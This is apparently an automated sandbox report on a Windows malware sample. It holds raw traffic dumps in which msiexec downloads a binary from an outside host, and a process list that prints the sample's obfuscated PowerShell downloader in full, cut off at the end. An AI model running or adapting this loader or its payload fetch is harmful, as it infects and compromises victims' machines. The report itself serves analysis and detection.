                                                                                                                                      Data Ascii: z5dGcjOsKzBxjAy0+gHPBlACJ++ZjDbxbgcTOkDvll7GQJoX/d/TVMFAFw4Q3akQIeJ1YYYc7VF95hJSH29k8BaxjEW8CWJAjgcBg0575UNOe+VDTnvlQ057/V3L7Y2iiE5hFAnpCtRnvM0/waomfc2tktj5P7GhqQylA054JQ/ve+VDTnvlQ0575UNOe+VDUK2qx5Mm+UVKSny6efsqEOAFbA6nS7t26TmnlcthdyAtr0vDXDPdIzLiNnVkW5n
                                                                                                                                      2024-12-18 18:27:14 UTC8000INData Raw: 56 4a 38 72 67 79 35 47 70 73 32 57 72 6f 45 5a 71 48 58 35 59 70 69 62 6d 4c 41 55 76 32 78 58 34 50 7a 58 36 72 67 62 6d 64 6f 48 6e 6b 6d 6a 4e 4f 6b 30 44 46 58 62 6d 66 5a 69 38 6e 4e 6a 4d 74 73 42 39 36 61 5a 71 64 32 55 71 38 77 6f 69 47 4c 34 71 38 6b 52 36 55 73 7a 36 76 51 4b 32 39 71 6d 52 6b 57 72 38 39 72 4e 69 69 6a 44 54 6e 76 6c 51 30 35 37 35 55 4e 4f 65 2b 56 44 54 6e 76 39 6f 48 4f 64 74 69 32 30 4d 71 6e 2f 75 65 44 39 65 51 38 6f 75 7a 4a 67 6f 67 4e 58 78 79 54 2f 51 7a 42 5a 43 69 2b 4f 4f 2b 56 68 4b 77 48 6c 41 30 35 5a 6c 64 66 73 6e 70 39 44 44 6e 76 78 4c 52 54 58 61 6e 6b 75 42 35 74 36 4f 64 39 46 4f 53 47 63 6b 4a 59 75 42 36 62 33 32 68 4c 46 50 7a 77 2f 73 36 50 73 4f 62 56 43 46 45 2b 69 67 64 53 58 4f 71 44 77 69 58 61
                                                                                                                                      Data Ascii: VJ8rgy5Gps2WroEZqHX5YpibmLAUv2xX4PzX6rgbmdoHnkmjNOk0DFXbmfZi8nNjMtsB96aZqd2Uq8woiGL4q8kR6Usz6vQK29qmRkWr89rNiijDTnvlQ0575UNOe+VDTnv9oHOdti20Mqn/ueD9eQ8ouzJgogNXxyT/QzBZCi+OO+VhKwHlA05Zldfsnp9DDnvxLRTXankuB5t6Od9FOSGckJYuB6b32hLFPzw/s6PsObVCFE+igdSXOqDwiXa
                                                                                                                                      2024-12-18 18:27:14 UTC8000INData Raw: 2b 5a 6d 6a 76 39 4d 31 4a 77 35 55 49 2f 38 79 33 65 7a 4f 67 4b 33 41 68 77 66 55 4d 48 2f 67 38 78 7a 35 49 45 74 6f 2f 57 4e 51 78 2f 36 30 33 61 46 6f 56 61 34 57 6f 55 50 4f 65 39 6f 31 66 4b 57 46 4c 67 70 37 5a 55 4e 62 63 44 66 32 6d 70 55 6d 72 41 6a 39 52 54 2b 4a 49 63 55 74 37 67 63 37 4d 4d 44 61 68 54 4f 72 41 72 4c 31 32 74 7a 48 4f 38 34 39 51 69 4a 34 4a 57 46 68 70 71 48 44 61 78 57 53 56 55 52 32 41 2b 61 6b 2b 2b 4d 73 56 39 74 64 4a 37 57 48 4f 32 48 4d 77 45 32 7a 7a 58 34 74 4e 33 79 74 50 2b 58 44 54 6d 61 59 6c 79 41 49 58 42 79 6b 47 35 6b 69 57 73 34 55 49 7a 49 68 63 43 49 6c 32 35 55 37 53 63 39 71 46 36 6c 5a 6e 59 45 4d 6e 4b 74 78 45 50 38 6a 39 41 31 6c 79 46 4a 51 6c 53 4a 61 6c 51 4d 4c 44 51 63 33 46 78 76 66 6e 63 51
                                                                                                                                      Data Ascii: +Zmjv9M1Jw5UI/8y3ezOgK3AhwfUMH/g8xz5IEto/WNQx/603aFoVa4WoUPOe9o1fKWFLgp7ZUNbcDf2mpUmrAj9RT+JIcUt7gc7MMDahTOrArL12tzHO849QiJ4JWFhpqHDaxWSVUR2A+ak++MsV9tdJ7WHO2HMwE2zzX4tN3ytP+XDTmaYlyAIXBykG5kiWs4UIzIhcCIl25U7Sc9qF6lZnYEMnKtxEP8j9A1lyFJQlSJalQMLDQc3FxvfncQ
                                                                                                                                      2024-12-18 18:27:14 UTC8000INData Raw: 71 55 35 48 72 41 44 37 5a 55 4e 30 66 78 47 44 7a 6d 46 6c 56 79 41 63 38 68 4e 64 57 35 55 2f 7a 69 51 66 6f 7a 34 34 42 41 4c 7a 47 35 38 43 64 63 72 75 59 51 6f 32 4d 65 39 49 4c 46 50 4a 62 57 65 4b 2f 32 37 65 64 68 6e 64 58 33 41 32 58 67 4a 42 74 66 42 74 6e 32 65 33 75 79 56 77 54 54 62 69 51 6a 6c 67 41 38 6e 78 2b 47 6a 67 72 58 2f 6a 4b 72 39 4e 38 51 69 6f 53 52 30 41 56 70 6a 65 74 31 38 59 4e 42 6c 4e 75 35 63 77 54 6e 76 6c 51 30 35 37 35 55 4e 4f 65 2b 56 44 54 6e 76 6c 57 5a 4e 4a 55 35 68 45 7a 57 4f 53 52 31 56 59 59 6e 48 70 35 4b 75 39 62 49 54 4e 56 51 72 57 78 76 6c 7a 6f 52 4d 62 62 62 64 31 41 6a 61 5a 32 35 48 78 6d 37 58 69 67 4e 51 65 4d 62 69 72 38 62 42 35 71 77 38 49 4c 4f 61 4e 58 4a 4e 4d 38 32 36 6b 75 6b 4e 4e 6d 75 4b
                                                                                                                                      Data Ascii: qU5HrAD7ZUN0fxGDzmFlVyAc8hNdW5U/ziQfoz44BALzG58CdcruYQo2Me9ILFPJbWeK/27edhndX3A2XgJBtfBtn2e3uyVwTTbiQjlgA8nx+GjgrX/jKr9N8QioSR0AVpjet18YNBlNu5cwTnvlQ0575UNOe+VDTnvlWZNJU5hEzWOSR1VYYnHp5Ku9bITNVQrWxvlzoRMbbbd1AjaZ25Hxm7XigNQeMbir8bB5qw8ILOaNXJNM826kukNNmuK
                                                                                                                                      2024-12-18 18:27:14 UTC8000INData Raw: 55 58 36 6c 51 70 38 7a 70 72 69 78 57 41 58 69 59 6b 51 39 6d 57 6c 44 2b 68 74 2f 39 4d 7a 72 6e 48 69 56 49 51 4d 6e 4a 57 37 79 57 4e 48 51 45 2b 55 6e 70 33 48 59 52 6a 48 64 62 42 33 4e 63 36 77 38 7a 54 70 74 57 70 34 58 62 67 71 44 51 38 78 6e 34 7a 4f 4f 34 4a 33 6c 47 35 53 52 4c 65 7a 7a 59 51 6d 5a 46 75 61 5a 6c 61 50 46 51 75 6a 76 59 79 6b 48 38 56 34 2b 4b 6e 2b 69 41 70 56 4c 6e 57 6f 52 70 30 5a 63 53 44 62 71 4f 68 30 32 6c 4b 77 59 67 6f 4d 4f 65 38 73 4c 4c 2f 4d 6a 63 46 59 70 65 32 68 69 6d 4a 2b 35 42 62 31 70 58 58 6f 79 37 54 39 2f 48 50 39 79 7a 50 4f 6e 51 37 73 30 48 73 46 31 69 6e 30 63 41 44 72 66 55 59 43 79 52 54 38 59 36 51 71 72 4c 67 65 68 4e 7a 75 55 63 4f 7a 76 6a 42 33 4e 62 67 42 70 68 36 6d 77 42 54 4c 69 79 33 4e
                                                                                                                                      Data Ascii: UX6lQp8zprixWAXiYkQ9mWlD+ht/9MzrnHiVIQMnJW7yWNHQE+Unp3HYRjHdbB3Nc6w8zTptWp4XbgqDQ8xn4zOO4J3lG5SRLezzYQmZFuaZlaPFQujvYykH8V4+Kn+iApVLnWoRp0ZcSDbqOh02lKwYgoMOe8sLL/MjcFYpe2himJ+5Bb1pXXoy7T9/HP9yzPOnQ7s0HsF1in0cADrfUYCyRT8Y6QqrLgehNzuUcOzvjB3NbgBph6mwBTLiy3N


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.649837202.71.109.2284434156C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 18:27:56 UTC167OUTGET /ef/ef.bin HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                      Host: www.tdejb.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-18 18:27:57 UTC223INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 18 Dec 2024 18:27:56 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Last-Modified: Wed, 18 Dec 2024 04:50:01 GMT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Content-Length: 449600
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      2024-12-18 18:27:57 UTC7969INData Raw: d8 ea 63 d0 dc b4 e7 7b a0 48 8d 32 bc aa a8 a1 d9 72 4d 49 ee 58 76 8f 5b 71 ac d4 fc 2c 97 36 74 07 89 0b e4 d7 63 9d 75 eb 2f 56 b6 11 90 9d d7 7a 11 fa 66 b6 6c c5 4b 66 d1 c8 33 46 cb 41 e0 c7 2c 28 cf 28 24 36 89 0a d7 ff c3 4b 4c e2 fd 9b 44 16 3d 05 3e a0 d4 57 3a b7 39 b0 61 c5 01 f3 50 6d 31 01 17 d5 68 bd eb ff 2f e3 59 da e9 bc 36 0d d5 ef d1 81 c9 a0 bd 45 51 17 aa d3 43 57 db 1f bb 5c 76 87 7d 5c fd 3a d9 a1 47 6a e4 f6 ce 84 63 d5 89 30 4c 8c 98 94 19 b1 fb 1f f7 91 22 05 eb 65 86 27 d6 d2 a1 bf 9b 0f 2f ef ec 91 e9 cf a6 a1 70 6b e0 4c 50 4b cf 11 bb 76 ca 1b bb 83 1f 0c 59 0c 67 a1 b9 9d 24 7a f9 c0 a2 86 20 08 f2 84 37 aa 7c d0 95 d9 f3 41 6b c2 41 ba e7 85 17 e4 77 4d 05 00 70 06 1a 73 c7 a3 82 a9 26 70 67 91 73 96 c4 ed 9c 5b 01 f7 e4
                                                                                                                                      Data Ascii: c{H2rMIXv[q,6tcu/VzflKf3FA,(($6KLD=>W:9aPm1h/Y6EQCW\v}\:Gjc0L"e'/pkLPKvYg$z 7|AkAwMps&pgs[
                                                                                                                                      2024-12-18 18:27:57 UTC8000INData Raw: 4f 1d 77 20 2e 60 83 48 87 3f 9a b3 56 4e 53 85 23 a7 56 07 6d d0 ba 28 e9 84 e9 20 b8 29 a5 06 ec 02 55 79 4a f6 04 e2 94 1e e5 bf 90 09 9b 81 10 59 78 a7 5f dc 4e 43 f6 a9 6a fd de b7 dd 23 90 1c 64 c4 a7 b1 31 6f 22 6b 60 32 3e 12 f8 1b fe 76 99 e3 7c d5 f3 dd 91 63 c2 0c ef 1b bd 9e 2f d5 be 6e da b3 49 05 67 9e c4 23 da 45 18 5f 98 7a d4 2d 22 10 2e 8e 0b bc c1 03 9f 89 b0 f3 87 a6 98 6d c0 fc 21 52 67 04 8d e4 b5 94 ec dd 4d c7 a7 3f 4e 4e a3 c8 d9 36 7e 27 3c ab 8e 0f 64 3b d0 66 eb 5b 1d f0 6a 72 5d 2f 54 01 f5 ef cd d1 dc 44 b2 8c 44 db 2c 1b 23 ac ae 2a 49 c4 97 fb 88 0b e6 53 ba 59 ec fb d9 27 06 05 83 db 18 73 e3 59 5b 49 9d 21 90 ea b4 4a be 92 ae 04 32 63 04 98 2e 88 bd 67 06 0b d3 ee b0 98 b9 2f 5d 3b 1a a3 70 ea f1 85 1d 0f 09 b9 8b 98 e5
                                                                                                                                      Data Ascii: Ow .`H?VNS#Vm( )UyJYx_NCj#d1o"k`2>v|c/nIg#E_z-".m!RgM?NN6~'<d;f[jr]/TDD,#*ISY'sY[I!J2c.g/];p
                                                                                                                                      2024-12-18 18:27:57 UTC8000INData Raw: 89 d6 78 9e f0 8e 59 6b fd ff b0 a0 41 10 40 14 59 e4 c6 49 f7 ab 0e 69 95 84 9e cf f7 bb 33 0c d0 2c 1b 8d fb 0e 06 c4 00 58 2e 6d 27 cc a9 ae 09 be 22 ca 45 1e 67 99 be 69 97 1c 1d 4a 21 12 99 04 c1 a6 ce 3a 79 5b b4 aa dc 82 ad c8 ac 3e 85 e2 41 93 33 2e fc ea 06 97 b7 88 90 28 8c 3f c1 26 a6 05 57 3a 42 c8 24 d1 f0 76 26 5d 00 d5 ad be 15 50 5b 9b 73 44 60 d3 b3 e1 33 1b 82 40 0c 25 e3 c6 df 8e 14 c1 61 3c 19 da 3d 02 bd 0f 80 52 a2 b4 ff 71 af ef 3a 48 d8 c3 55 44 12 3a 6d 15 7b da 9a c9 91 a1 9b af 48 b8 9c 86 93 38 ca c5 8c e7 a3 07 c1 39 3e bf 7d 7b 2e 96 fc c6 dc a1 5b 78 1a 1d a8 b1 92 de 3c 1c 51 b9 85 1e 7d b8 a4 96 2f 49 25 d6 e3 ad 8d 68 ac e4 ba be 0e 46 aa eb 90 d4 8d ae 55 cf d5 ef 50 94 f6 24 03 31 5f 68 c9 22 e3 bb 56 c4 f3 b8 f4 c9 75
                                                                                                                                      Data Ascii: xYkA@YIi3,X.m'"EgiJ!:y[>A3.(?&W:B$v&]P[sD`3@%a<=Rq:HUD:m{H89>}{.[x<Q}/I%hFUP$1_h"Vu
                                                                                                                                      2024-12-18 18:27:57 UTC8000INData Raw: 93 ce 55 b2 28 b7 8a f3 a2 e5 66 6f 63 44 0d 4a b4 45 a9 e9 48 7d 4c 43 ec 5b 23 9a 88 96 b2 9f e9 d5 54 a9 cd ec 36 fc 82 ff d9 d6 2a 3d 1a 48 4e 00 9d 88 65 fb 70 ff fb 50 05 20 22 72 24 b3 02 52 df f0 b7 86 97 54 85 f4 a1 6d 7a c0 70 61 59 5a ee e1 8b 3a 16 eb 10 f1 c0 d8 55 98 76 e1 50 c0 97 d7 71 50 56 59 db 13 2f cf 5e 79 9a ae b1 7a aa e0 e0 ae 3b 5d 21 e1 9a 58 f5 91 88 6b f0 89 73 bf 4a 8e 8b 59 af c2 9e 4c ee 90 21 c6 1e fb ae 62 ee c8 1c b1 f3 51 cb 6c a3 d3 ba e2 ee ba d9 6d 1b a7 09 25 80 56 10 52 eb f6 81 b6 5f 95 69 e5 88 48 7c 18 a2 c9 41 f1 f4 15 48 12 04 ff 5e 3a 3c e7 b8 9b d4 19 77 3d 34 d7 49 57 a0 48 8c 6a 01 e1 12 a6 64 60 13 a1 7b dc 71 83 5c e3 ac a1 6e 52 ab 71 d4 57 28 cc 44 11 30 ce 04 ec c9 a1 a5 d2 a6 c9 e3 71 a2 81 d5 de a3
                                                                                                                                      Data Ascii: U(focDJEH}LC[#T6*=HNepP "r$RTmzpaYZ:UvPqPVY/^yz;]!XksJYL!bQlm%VR_iH|AH^:<w=4IWHjd`{q\nRqW(D0q
                                                                                                                                      2024-12-18 18:27:57 UTC8000INData Raw: 41 2a c5 59 df ad 23 7f 43 da 19 30 46 cb 5c 61 80 7e 70 3d c9 cf c4 5b 04 36 e7 f7 f2 94 0d e5 fc 61 41 fa 8a 6b 87 fe a8 c4 50 3f 4c 0b f8 72 33 d8 20 bf 99 14 15 03 f0 39 8c 92 6f ed 03 89 da 74 33 58 aa 66 c1 91 51 dc e8 e1 09 27 d6 16 85 c1 05 08 56 27 d2 db 57 eb ff ad 39 4b 12 3d 44 02 70 f7 db c0 1f 54 6d b7 68 ed a3 74 a0 f1 df eb 7d 6d 22 f0 24 31 22 fe b4 5b 2a 3e 9c b6 23 31 56 da 3b 20 b9 70 dc 06 38 26 4d b3 be 5e a1 18 aa 8b d9 e5 19 32 33 96 9e 87 37 32 45 2f 00 41 de de f6 0d cb 9d e4 ff a1 a8 eb e4 43 37 43 2c aa ad a7 11 a3 fb 49 4d 66 10 88 35 03 65 ce c7 09 a3 f4 84 8a 2c e9 a2 f1 78 5c 3a de 18 9c 94 64 81 d4 4e e9 03 20 c2 b8 0f 4e ba b0 ea 58 23 ac 92 fd e5 ab 18 2c 31 79 04 27 df ab 60 e2 0d d8 d1 be 53 88 c4 e0 24 fc 5a 8b e1 24
                                                                                                                                      Data Ascii: A*Y#C0F\a~p=[6aAkP?Lr3 9ot3XfQ'V'W9K=DpTmht}m"$1"[*>#1V; p8&M^2372E/AC7C,IMf5e,x\:dN NX#,1y'`S$Z$
                                                                                                                                      2024-12-18 18:27:58 UTC8000INData Raw: f1 86 cc 7f 98 46 c7 60 5e d7 ad da dd 5a 19 bd fa 06 12 99 92 81 74 7e 61 af b5 d3 c6 d3 07 90 b4 d9 12 8d 05 e4 ff 6f b6 eb 06 d0 b0 6e 9c 68 88 ab fd 7d 0c 07 1a 3b 27 df b0 cf 93 ee 30 4c 9a 1d 11 a7 27 d5 ce 24 76 99 fb 34 d7 1c 36 c4 84 78 54 80 21 98 50 65 db 68 87 02 56 b7 85 3e e4 b9 7d 5f 81 7c e9 7e 33 b8 63 67 02 00 d2 96 39 b4 c8 eb 3c e7 f8 ad d2 56 67 bc f1 6c 1f 4e bf 5a f0 91 b4 5e f6 0d ab fa a7 5d 74 3a 5f 63 8a 1d e3 1a 7a 2b 1b fa 96 e5 27 6c 5c cf 97 1c ef bf be 34 ef 71 2c 7d 37 68 bf a3 5f aa ea 5c c6 62 0f 64 de 85 0a c0 0f eb 3c 95 5c 03 b0 96 b3 c2 1e d2 f3 ff 25 41 31 bc 66 41 a4 b7 2b 3e ee ff 7d c0 4a 05 42 1f 5c d8 6b 3c 48 f2 66 5b aa dd 7c dc e7 99 f8 f2 24 4d 0f 3f ff 4b 45 ef c5 e0 65 f4 cc e9 22 9f ab 56 8a cb 62 61 40
                                                                                                                                      Data Ascii: F`^Zt~aonh};'0L'$v46xT!PehV>}_|~3cg9<VglNZ^]t:_cz+'l\4q,}7h_\bd<\%A1fA+>}JB\k<Hf[|$M?KEe"Vba@
                                                                                                                                      2024-12-18 18:27:58 UTC8000INData Raw: 8f 44 9b c7 f7 ed a0 17 5b 44 6d f6 a0 6c a8 ed 12 e6 4a 89 f2 c0 81 38 45 7a 64 25 21 bb d8 a5 b5 48 b1 c6 25 91 b0 a2 e8 71 77 3b 5c 58 cc f3 8c a7 ea 13 e7 f2 dd 02 28 c4 76 2d bb 17 d5 c9 be ee c2 10 d2 3a a8 aa a2 56 4a fb 6d 93 90 aa 44 01 fc ff dc 2d 4d 2d 34 63 60 e0 ca 85 1f b0 e2 ec d6 6b 2b 2d e4 25 1b 80 8f 86 cf c3 b0 18 fb 3f 44 e8 d9 35 ec 75 86 0c d0 49 49 72 2b a2 0f 49 20 12 8c d1 a6 e0 f8 9f 35 60 73 f7 f8 7e 84 e7 7f 78 65 bf 09 d2 62 39 11 4d c5 3e e8 7c 68 6d 66 48 bd 91 8e 61 bb e1 c3 20 79 8f 6a 9d 59 11 95 60 c7 8a bc af 47 3a 8f ad f5 64 c3 01 bd 96 0d 4e 11 e6 87 c5 92 45 2d 46 84 eb c7 98 ba 94 c7 c2 79 98 e6 5f 75 9d e8 7e af 40 b8 33 44 34 79 1a a3 d6 91 5a 0a 6a f0 15 1b f5 40 a4 b3 59 2f 00 b2 e8 d4 10 ea cb 19 e4 1e ca 1a
                                                                                                                                      Data Ascii: D[DmlJ8Ezd%!H%qw;\X(v-:VJmD-M-4c`k+-%?D5uIIr+I 5`s~xeb9M>|hmfHa yjY`G:dNE-Fy_u~@3D4yZj@Y/
                                                                                                                                      2024-12-18 18:27:58 UTC8000INData Raw: 01 5d 41 1b bd 0f cf d4 13 f7 12 3d 78 27 b3 ca ec 0f 96 dc 65 18 8a fb 4d 75 cd 0e fe 68 02 50 9f b0 09 08 7c 9c 6c ef cd 05 21 4d d6 0b 06 fe ec 73 4d 00 c6 01 f4 17 ec 04 ee 67 95 e6 da 81 57 b1 b0 c4 d1 34 51 39 92 90 1e d4 b9 bc 3b 38 2e 8f 3c d3 56 bd e7 0c 05 28 d0 95 80 38 f0 44 90 17 7a 14 4c 3c ed 70 fd e9 ae 4b 8c 23 fd 9c 64 1e 9f 03 5c 84 3e 33 10 37 da 26 b4 e0 69 f6 a8 18 94 10 c6 8a 68 61 1a 16 23 8e f7 48 c7 d2 1c 41 ad ce 51 39 8c 89 19 74 5e 60 15 4d 80 8c ce 48 52 dc e3 c2 f0 f8 46 72 ac 28 1d 14 08 b5 7c c2 dd 2e 61 2a 8b 02 b4 3c 12 82 6e d6 65 3d 2c 7b fa ea 52 7a c7 6a 8b 4f 79 50 8f c7 50 2f 65 0d 32 2a 67 fe e3 59 2e 29 57 78 59 f9 34 a5 97 4f c1 ef c5 73 60 07 c9 62 9e 9a 18 b0 4b 6f 85 48 a2 7f 1b 6d 6a 80 fb 95 84 da d0 9f b8
                                                                                                                                      Data Ascii: ]A=x'eMuhP|l!MsMgW4Q9;8.<V(8DzL<pK#d\>37&iha#HAQ9t^`MHRFr(|.a*<ne=,{RzjOyPP/e2*gY.)WxY4Os`bKoHmj
                                                                                                                                      2024-12-18 18:27:58 UTC8000INData Raw: 3b 0b e5 1d 5e cc cc b4 15 b0 77 18 eb d8 d5 d4 e2 ee c3 ef dd ee bd 67 9f 2b 05 23 0c 86 a5 6f 7a 24 79 be 4e ff 04 a9 a8 9a 63 8b 25 1b 4e 14 f2 cd 83 0c 30 14 ef 1c fd f2 c1 39 48 36 2b 67 79 a5 59 60 22 90 60 b7 a2 1c 15 5f 82 b7 d5 9a 22 b8 b8 22 10 01 17 77 ee 59 88 c0 6d cf 5f 45 f7 ec 7a 99 c9 1d 4a 32 ea d3 8b cd 21 7d b4 8c 63 77 e1 3a 3f 1d 00 cb 82 a6 d2 20 f5 24 cb f3 7d b9 ec 74 5a 11 f8 86 db 36 82 ad 9f d6 cd 77 6f 5f d5 53 0a 0f b5 14 20 5a 67 41 f1 40 3b a3 8c 64 56 4c 9f 06 b3 d4 49 39 4e d8 e1 31 c4 07 3e 60 49 ae e9 b1 b4 ee cf 93 3a 21 54 0a c9 d8 ae 8b 64 aa cc 9a 20 ed 9e d0 cb 99 2d ba ab 56 75 95 0a d6 97 74 19 11 6f 64 30 17 1a 30 3f 8b 38 89 b3 93 79 f5 8e c4 36 9f ff b0 14 5d aa e4 14 17 fc 5b a5 f7 21 94 db 98 84 f7 15 e1 8d
                                                                                                                                      Data Ascii: ;^wg+#oz$yNc%N09H6+gyY`"`_""wYm_EzJ2!}cw:? $}tZ6wo_S ZgA@;dVLI9N1>`I:!Td -Vutod00?8y6][!
                                                                                                                                      2024-12-18 18:27:58 UTC8000INData Raw: da 0e 84 ed f0 b7 d4 11 77 d9 fc 1a 73 b1 e7 4a 52 7d 19 bb f8 01 15 2f b0 ec fe 2c 3b 11 51 28 8c 94 38 0e ef 11 f7 b1 c3 fc 6b c7 36 48 01 20 a7 31 9b 5c bd 2f 96 20 80 8b 4a 64 82 f3 0f c5 ba 96 cb 52 91 1b e3 01 8d ba 19 60 11 b1 ed 0e 1c 7e c0 ca 23 96 82 72 65 e8 b7 48 72 f9 bd 17 13 85 95 05 fc 1c 1b dc bd 04 19 41 70 8c 69 68 6f a2 c6 71 e8 1a 14 9b 21 6d 57 fc 36 d0 6f ad aa 39 50 5f c7 7b 72 03 a8 ca cc bf 77 bb 24 3c 86 6a 69 55 cf 6a 7e 83 c9 6a d8 b9 06 33 7c 9a ae 22 43 b2 e8 28 96 7a 3a 87 12 cf 9d 22 c8 ca 3f 80 45 e1 e2 38 80 ee 04 b6 f2 33 6a 41 02 14 d6 08 a8 ce f1 24 c0 4f 55 64 d4 57 45 f2 00 4e d8 c5 b8 ed ab 77 0b 6a b7 1d 89 10 88 08 64 1d b9 93 16 42 91 1b b7 6e b0 53 18 66 79 6c 94 e8 4a c9 1e 05 f7 48 aa 25 60 61 5b 67 f6 a5 90
                                                                                                                                      Data Ascii: wsJR}/,;Q(8k6H 1\/ JdR`~#reHrApihoq!mW6o9P_{rw$<jiUj~j3|"C(z:"?E83jA$OUdWENwjdBnSfylJH%`a[g


                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:13:27:02
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\g8ix97hz.vbs"
                                                                                                                                      Imagebase:0x7ff70ef90000
                                                                                                                                      File size:170'496 bytes
                                                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:13:27:05
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:wmic diskdrive get caption,serialnumber
                                                                                                                                      Imagebase:0x7ff79e6d0000
                                                                                                                                      File size:576'000 bytes
                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:13:27:05
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:13:27:07
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu 